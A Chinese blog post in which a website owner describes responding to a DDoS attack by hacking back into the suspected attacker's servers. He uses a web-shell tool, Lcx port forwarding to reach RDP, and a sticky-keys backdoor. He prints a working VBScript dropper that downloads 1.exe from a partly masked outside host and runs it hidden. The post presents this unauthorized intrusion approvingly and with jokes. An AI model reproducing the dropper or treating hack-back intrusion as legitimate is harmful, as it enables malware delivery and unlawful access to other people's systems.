【摘要】最近小东的网站(第一资源网)遭到大量ddos攻击,前几天有人给小东反应了这个问题。刚开始,还没注意,觉得就这样吧,反正服务器费用也不贵,可能还赶不上DDOS的费用...emmm~...
最近小东的网站(第一资源网)遭到大量ddos攻击,前几天有人给小东反应了这个问题。
刚开始,还没注意,觉得就这样吧,反正服务器费用也不贵,可能还赶不上DDOS的费用...
emmm~小东大概也知道是谁干的【滑稽】
那么接下来,咋办呐?
第一:小东一向讲求和气生财,信誉做事,努力追求双方的信任去赢得更多的信任和价值。小东愿意和各位互联网上的各位大神、小白成为朋友,但只有一个前提,你必须讲诚信。不管这个世界有多少人背信弃义,我,小东坚决坚守自己做人的底线和道德标准,我坚信,人若无信,难立于世。
第二:从接到热心网友反应,小东才开始逐渐重视起来,为什么呐?其一就是不能助长这种小人心理气焰,其二也是对做黑产的反调查吧。
第三:目前已经收集到80%的信息,从DDOS的攻击来源,反查到某黑阔地址以及相关信息以及emmm~自己感受。
顺着就是一顿反围剿(有点艰辛MMP),通过某IP查到某个熟悉类型的网站,然后菜刀,发现3389没开?搞TM的棒棒锤啊?
然后Lcx端口转发,服务器进行监听51端口,转发到33891端口,渗透进入内网,登陆服务器
一般的大黑阔就喜欢留下shift后门,然后五次shift,TMD就进来了,也可能这台服务器万人草,不过不像是【误会,嘿嘿~】。
登陆了某已经沦陷的服务器,查看日志,你以为这么简单就查到了?
nonono~,人家当然是把日志什么的都清理干净的啦~这样子就查到了,人家大黑阔岂不是要翻船?
进去以后仔仔细细反了个遍,mdzz,没有马儿跑?【除了我自己的小马在吃草】
这些ddos的菜逼黑客,一般就是什么自动抓鸡,每天疯狂扫描...(小东早已退出B界,没想到还有大黑客这么风骚)
于是马上连接到了另外一台在外网的服务器
创建的1的用户名,有毒吧???不知道换一个吗,比如去一个gvest也好啊,好歹产生一个干扰啊?
然后就找到了某些有趣的东西【滑稽】
Set psp = CreateObject("Msxml2.XMLHTTP") set ws=WScript.CreateObject("WScript.Shell") psp.Open "GET","http://117.*.*.*:9674/1.exe",0//这些黑客喜欢1.exe? psp.Send() Set aGet = CreateObject("ADODB.Stream") aGet.Mode = 3 aGet.Type = 1 aGet.Open() aGet.Write(psp.responseBody) aGet.SaveToFile "c:\1.exe",2 wscript.sleep 8000 ws.Run "c:\1.exe",0
这个vbs执行后是要下载一个名叫 1.exe的木马程序。然后我们就可以登陆对应HFS的117.*.*.*:9674(这熟悉的端口,我貌似想到了什么木马呐~,脑袋有点发散,哈~)
嗯,后面的就不多叙述了,就这样吧,其余的到时候看情况交给警方就行了.
我们去大草原的湖边,听候鸟飞回来,等我们都长大了....就这样吧~
**************************************************************************
忘了,我咋没说咋修复的呐?oopss~
对方使用NTP反射放大,也就大致放大700倍的样子,对方的攻击大致有160+的样子,关了ntp服务就好,参考下图:
妈蛋,图片没保存。。。
登陆xshell
按照下面的骚操作:
小东的网站当然不只是这么简单啦~,每天那个超级无敌大黑阔还在对着某个废弃服务器DDOS~【莫名喜感】
小东
简介:专业团队网站开发、安全运维,合作意向请联系!
发表评论